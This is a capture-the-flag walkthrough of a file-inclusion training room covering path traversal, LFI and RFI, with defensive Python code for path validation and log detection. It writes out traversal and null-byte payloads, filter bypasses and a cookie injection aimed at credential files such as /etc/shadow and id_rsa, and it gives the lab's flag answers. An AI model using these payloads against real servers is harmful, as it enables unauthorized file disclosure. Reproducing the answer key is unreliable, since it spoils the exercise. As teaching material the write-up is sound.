Learning Objectives:
- Understand in detail how File Inclusion vulnerabilities occur
- Learn how to secure the system against File Inclusion and how to remediate the system if this vulnerability is found
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
This room consists of 8 tasks: 1. Introduction 2. Deploy the VM 3. Path Traversal 4. Local File Inclusion — LFI 5. Local File Inclusion — LFI Continued 6. Remote File Inclusion — RFI 7. Remediation 8. Challenge
I will walk through each room with my own answer method
===============================================================
- Task 1: Introduction
This room will provide us with the knowledge to exploit file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal. At the end we will also be given a practical exercise to get hands-on experience with File Inclusion.

Let's discuss a scenario where a user requests to access files from a webserver. For example, if a user wants to access and display their CV within the web application, the request may look as follows: http://webapp.thm/get.php?file=userCV.pdf

If we are wondering…
Why do File Inclusion vulnerabilities happen?
This is mostly because the PHP code is poorly written and implemented, so user input is not sanitized or validated, and the user controls it.
Q1) Let's continue to the next section to deploy the attached VM.
Answer: no answer needed
===============================================================
- Task 2: Deploy the VM
As the title itself says, we are provided with a VM to dive deeper into File Inclusion vulnerabilities, and the display will look like this after navigating to the link

Q1) Once you've deployed the VM, please wait a few minutes for the webserver to start, then progress to the next section!
Answer: No answer needed
===============================================================
- Task 3: Path Traversal
Path traversal, also known as Directory Traversal, is a web security vulnerability that allows an attacker to read OS resources. It occurs when an attacker successfully manipulates the web app's URL to locate and access files or directories stored outside the application's root directory.
How do we avoid this?
The user's input is passed to a function such as file_get_contents in PHP, so…
First, we have to make sure that we validate and filter all inputs that could reach such a function and cause this vulnerability. For instance…

The image above shows how a web app stores files in /var/www/app, and the user is requesting the CV file from the app directory.
A path traversal attack means that the attacker takes advantage of moving one directory up using the "../" sequence, e.g. http://webapp.thm/get.php?file=../../../../etc/passwd
Suppose there is no input validation; the attacker could then exploit it using path traversal to access other sensitive information on that server.
There are some common OS files we could check for when testing for Path Traversal, such as:
- /etc/issue : contains a message to be printed before the login prompt
- /etc/profile : controls system-wide default variables, like the file creation mask, terminal types, etc.
- /proc/version : specifies the version of the Linux kernel
- /etc/passwd : has all registered users' passwords
- /etc/shadow : contains information on the system's users' passwords
- /root/.bash_history : contains the command history for the root user
- /var/mail/root : contains all emails for the root user
- /root/.ssh/id_rsa : contains the private SSH key for a user
- /var/log/apache2/access.log : contains the accessed requests for the Apache web server
Q1) What function causes path traversal vulnerabilities in PHP?
Answer: file_get_contents
===============================================================
- Task 4: Local File Inclusion — LFI
LFI attacks against web applications are often due to developers' lack of security awareness. Some PHP functions often contribute to vulnerable web applications, such as include, require, include_once, and require_once. Moreover, LFI can occur not only in PHP files, but also in other languages, like ASP, JSP, etc.
In this task, we will be diving deeper into various LFI scenarios and how to exploit them.
Scenario 1:
Suppose the web application provides two languages (EN, AR).

As we can see, the PHP code above reads a GET request via the URL parameter "lang". To load the English page, the call can simply be done like this: http://webapp.thm/index.php?lang=EN.php
Technically, if there is no input validation, we could simply read /etc/passwd, which contains sensitive information about the users of the Linux OS.
Scenario 2:
In the following code, the developer decided to specify the directory inside the function, as we can see in the image below…

The developer decided to use the include function to call PHP pages in the languages directory.
Again… if there is no input validation, we could manipulate the lang input to point at other OS-sensitive files.
Now that we have learnt about the 2 scenarios above, let's apply this knowledge to answer the questions below.
Q1) Give Lab #1 a try to read /etc/passwd. What would the request URI be?

Let's try to search for "welcome.php" first to see if there's any difference in the URL

And yep, we can see the URL change from /lab1.php to /lab1.php?file=welcome.php
Then we can immediately change it to this: /lab1.php?file=/etc/passwd

Answer: /lab1.php?file=/etc/passwd
Q2) In Lab #2, what is the directory specified in the include function?
In this question, we need to enter an invalid command to see the error message
For instance, I search for "pwd"

And yep, we can see the included directory is includes
Answer: includes
===============================================================
- Task 5: Local File Inclusion — LFI Continued
In the previous task, we learned how to bypass the filter within the include function.
Now we will broaden this and perform black box testing, in which we don't have the source code. In this case, errors are crucial to give us a better understanding of how the data is passed and handled!
Scenario 3:
In this scenario, we have an entry point such as
http://webapp.thm/index.php?lang=EN; if we try entering an invalid input, such as THM, we will get the following error:
Warning: include(languages/THM.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12
This is a big hint, namely the disclosure of include(languages/THM.php).
In addition, if we take a closer look, they are adding ".php" at the end of the filename (THM → THM.php). Besides that, we can see that the error message disclosed another important piece of information: the directory path /var/www/html/THM-4/, against which we could use the path traversal method.
Scenario 4:
In this section, the developer decided to filter keywords to avoid disclosing sensitive information, and /etc/passwd is being filtered. However, we could try some methods that make the input look different but still have the same meaning. For instance, by using the Null Byte %00, lang=/etc/passwd%00 is effectively the same thing as lang=/etc/passwd.
We could also use the method where we add "/." at the end (lang=/etc/passwd/. is the same as lang=/etc/passwd/).
Scenario 5:
If we type http://webapp.thm/index.php?lang=../../../../etc/passwd
we will get the following error:
Warning: include(languages/etc/passwd): failed to open stream: No such file or directory in /var/www/html/THM-5/index.php on line 15
p.s.: please pay attention to include(languages/etc/passwd),
which means the "../" has been replaced by an empty string. However, we could still do some manipulation to bypass this filter, such as
....//....//....//....//....//etc/passwd.

This is because the PHP filter only matches and replaces the "../" substring in a single pass, so the characters left over after the replacement spell "../" again.
Now, after learning the scenarios above, hopefully we can apply this knowledge to answer the questions below!
Q1) Give Lab #3 a try to read /etc/passwd. What does the request look like?
Answer: /lab3.php?file=../../../../etc/passwd
Q2) Which function is causing the directory traversal in Lab #4?

We can simply enter any invalid command to cause an error
Answer: file_get_contents
Q3) Try out Lab #6 and check which directory has to be in the input field.

Again, just enter an invalid command, and we can see the error message to analyse
Answer: THM-profile
Q4) Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

As we can see, we can only access files in the THM-profile folder
However… what we can realize is that the filter only detects the phrase "THM-profile" at the beginning of the input; that's why, when we run THM-profile/../../../../etc/passwd, it works!

And then, we can simply run THM-profile/../../../../etc/os-release

And we got the answer!
Answer: 12.04
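To make the validation advice from Task 3 concrete, here is an added example (my own code, not the room's or the lab's PHP) that reproduces the three failure modes seen above in Python: the single-pass "../" replacement from Scenario 5 that "....//" survives, the prefix-only check described for Lab #6, and the null-byte and trailing "/." tricks from Scenario 4. Beside each weak check it shows the containment check and allowlist lookup that actually hold. The directory names and the EN/AR page list are constructed to mirror the room's error messages; they are assumptions, not the lab's source.

```python
import posixpath

# Constructed paths for this example; they mirror the layout shown in the room's
# error messages (e.g. /var/www/html/THM-5/) but are not taken from the lab's source.
LANG_DIR = "/var/www/html/THM-5/languages"
ALLOWED_LANGS = {"EN", "AR"}  # the two pages Scenario 1 says exist (assumed)


def naive_filter(value: str) -> str:
    """The Scenario 5 filter: strip '../' in one pass.

    str.replace removes every non-overlapping '../' it finds but never re-scans
    the result, so the leftover characters of '....//' spell '../' again.
    """
    return value.replace("../", "")


def recursive_filter(value: str) -> str:
    """Repeat the replacement until the string stops changing.

    This closes the '....//' hole, but it is still a denylist and says nothing
    about where the final path lands; prefer resolve_under_base below.
    """
    while "../" in value:
        value = value.replace("../", "")
    return value


def starts_with_prefix(required_prefix: str, value: str) -> bool:
    """The check the Lab #6 write-up describes: look for the folder name at the start.

    It is a string test, not a path test, so 'THM-profile/../../../../etc/passwd'
    passes even though it leaves the folder.
    """
    return value.startswith(required_prefix)


def resolve_under_base(base_dir: str, requested: str):
    """Canonicalize base_dir/requested and accept it only if it stays inside base_dir.

    Returns the canonical path, or None when the request must be rejected.
    posixpath.normpath collapses '.', '..', '//' and a trailing '/.' in the string
    alone; on a live filesystem use os.path.realpath so symlinks are resolved
    as well before the containment check.
    """
    if "\x00" in requested:  # %00 after URL decoding (Scenario 4)
        return None
    # join() discards base_dir when requested is absolute, which is exactly why
    # the containment check below, not the join, is what enforces the boundary
    candidate = posixpath.normpath(posixpath.join(base_dir, requested))
    if posixpath.commonpath([base_dir, candidate]) != base_dir:
        return None  # escaped the directory (Scenario 5, Lab #6)
    return candidate


def safe_lang_page(lang: str):
    """Allowlist version for the 'lang' parameter of Scenarios 1 to 3.

    The canonical name must be one of the known pages; the '.php' suffix is
    appended by the server and never taken from the user.
    """
    if "\x00" in lang:
        return None
    name = posixpath.normpath(lang)  # turns 'EN/.' into 'EN', leaves '../x' alone
    if name not in ALLOWED_LANGS:
        return None
    return posixpath.join(LANG_DIR, name + ".php")


if __name__ == "__main__":
    payload = "....//....//....//....//....//etc/passwd"
    print(naive_filter(payload))      # ../../../../../etc/passwd
    print(recursive_filter(payload))  # etc/passwd
    print(starts_with_prefix("THM-profile", "THM-profile/../../../../etc/passwd"))  # True
    print(resolve_under_base("/var/www/html", "THM-profile/../../../../etc/passwd"))  # None
    print(safe_lang_page("EN/."))     # /var/www/html/THM-5/languages/EN.php
```

The two safe functions share one idea: decide on the canonical path, not on the raw string. resolve_under_base is the general form for a "files under this folder" feature, while safe_lang_page is the stricter form that fits a parameter with a handful of legal values, which is what the lang switcher in Scenarios 1 to 3 really is.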
===============================================================
- Task 6: Remote File Inclusion — RFI
Remote File Inclusion is a technique to include remote files into a vulnerable application. It is caused by the same root cause as LFI, namely improper user input sanitization. However, for RFI to happen, the allow_url_fopen option needs to be on.
Another impact that may be caused by RFI is RCE (Remote Command Execution) executed by the attacker on the server.
In the image below, we can see the RFI steps

Firstly, let's say the attacker injects a malicious URL, which points to the attacker's server. If there is no input validation, the malicious URL is passed into the include function. Ultimately, the web app server sends a GET request to the malicious server to fetch the file, and the remote file is included on that web server.
Q1) We showed how to include PHP pages via RFI. Do research on how to get remote command execution (RCE), and answer the question in the challenge section.
Answer: no answer needed
===============================================================
- Task 7: Remediation
As a Blue Team specialist, it is really crucial to be aware of web app vulnerabilities, including how to find them, fix them, and recover from their impact. Here are some suggestions we could take to add to our knowledge:
- Keep the system and services always up-to-date with the latest version
- Turn PHP error display off to avoid leaking any exploitable spots
- Implement a WAF (Web Application Firewall)
- Disable PHP features that can cause file inclusion vulnerabilities (if not needed)
- Monitor the web application regularly and do some kind of maintenance
- Implement a Zero Trust architecture, which means always validate user input and never trust it
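The "monitor the web application" point above is easiest to act on from the Apache access log that the room itself lists as a readable file. The following is an added example (my own code, not part of the room) that scans access-log lines for the indicators this room has shown: "../" sequences (including the "....//" form), a %00 null byte, an absolute path, a remote URL in a file parameter, and the sensitive file names listed in Task 3. The log lines are constructed samples in Apache combined format, and the 203.0.113.7 address and file names in them are made up.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" format; they are not from the lab VM.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?lang=EN HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /get.php?file=../../../../etc/passwd HTTP/1.1" 200 1832 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?lang=....//....//....//etc/passwd HTTP/1.1" 200 1832 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?lang=/etc/passwd%00 HTTP/1.1" 200 1832 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /playground.php?file=http://203.0.113.7/remote.txt HTTP/1.1" 200 88 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /lab1.php?file=welcome.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Files the room names as common traversal targets; seeing one in a parameter is a strong signal.
SENSITIVE_PATHS = (
    "/etc/passwd", "/etc/shadow", "/proc/version", "/etc/issue", "/etc/profile",
    ".ssh/id_rsa", ".bash_history", "/var/mail/root", "/var/log/apache2/access.log",
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to three layers of URL encoding so %252e%252e%252f is seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def indicators_for(value: str) -> list:
    """Return the names of every file-inclusion indicator present in one decoded parameter value."""
    hits = []
    if "../" in value or "..\\" in value:  # also catches '....//', which contains '../'
        hits.append("traversal")
    if "\x00" in value:  # %00 used to drop an appended '.php'
        hits.append("null_byte")
    if re.match(r"^[a-zA-Z][a-zA-Z0-9+.-]*://", value):  # http://, ftp://, php:// ...
        hits.append("remote_url")
    if value.startswith("/"):
        hits.append("absolute_path")
    if any(p in value for p in SENSITIVE_PATHS):
        hits.append("sensitive_file")
    return hits


def scan_access_log(text: str) -> list:
    """Parse each line, decode every query parameter and report those with indicators."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)  # parse_qsl decoded once; handle double encoding too
            hits = indicators_for(value)
            if hits:
                findings.append({
                    "ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
                    "status": m.group("status"), "param": param,
                    "value": value.replace("\x00", "\\x00"), "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['method']} {f['param']}={f['value']} -> {', '.join(f['indicators'])}")
```

Two caveats a practitioner would want: the access log records only the request line, so a payload moved into a POST body (the trick used in the challenge section) never appears here and has to be caught at the application or WAF layer; and a 200 status next to a "traversal" or "null_byte" hit means the server served the file, which turns a log line into an incident rather than just an attempt.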
Q1) Ready for the challenges?
Answer: no answer needed
===============================================================
- Task 8: Challenge
Now it's time to do the challenge, as we are provided with the VM and required to do some "CTF" things! Let's go!

Q1) Capture Flag1 at /etc/flag1
First, we need to run the browser through Burp Suite and activate the intercept

As we can see, the current request method is still GET, and we need to change it to POST by right-clicking anywhere and clicking Change request method

And yep, the interface will look like this

Now, what we need to do is use the POST request method to read /etc/flag1

And yep, we successfully got the flag
Answer: F1x3d-iNpu7-f0rrn
Q2) Capture Flag2 at /etc/flag2

The display looks like the above because the THM cookie is still set to Guest

So we have to change it to Admin then…

And yep, as we can see, now we are Admin!
However, if we take a closer look at the error message

First, "includes/Admin.php", where "Admin" is obviously taken from the cookie. Besides that, the statement "No such file or directory in /var/www/html/chall2.php" gives us a big clue…
What if we change the cookie to "../../../../etc/flag2%00", where "%00" makes the ".php" at the end ignored?


And yep, we successfully got the flag!
Answer: c00k13_i5_yuMmy1
Q3) Capture Flag3 at /etc/flag3

When I tried to input the dot (.), slash (/), or percentage (%), they always got filtered; as a result, after those were removed, the only thing remaining was the letters

However, when we intercepted through Burp Suite, we found that after changing to the POST method, the filter no longer works

Again, we need to change the request method first, then forward it

And yep, we successfully got the flag!
Answer: P0st_1s_w0rk1in9
Q4) Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

At first, the interface looks like this. This is interesting because we have the opportunity to apply our knowledge of RFI.
When I searched for the gg.php file, the interface looked like this…

We also see that there is no further filtering, as observed from the File Content Preview of gg.php, and we get the info on the current path.
Now, since there are 3 directories before the .php file, we have to use dot-dot-slash 3 times to go back to the parent directory before /etc/hostname → ../../../etc/hostname

And yep, we successfully revealed the content of the hostname execution!
Answer: lfi-vm-thm-f8c5b1a78692
===============================================================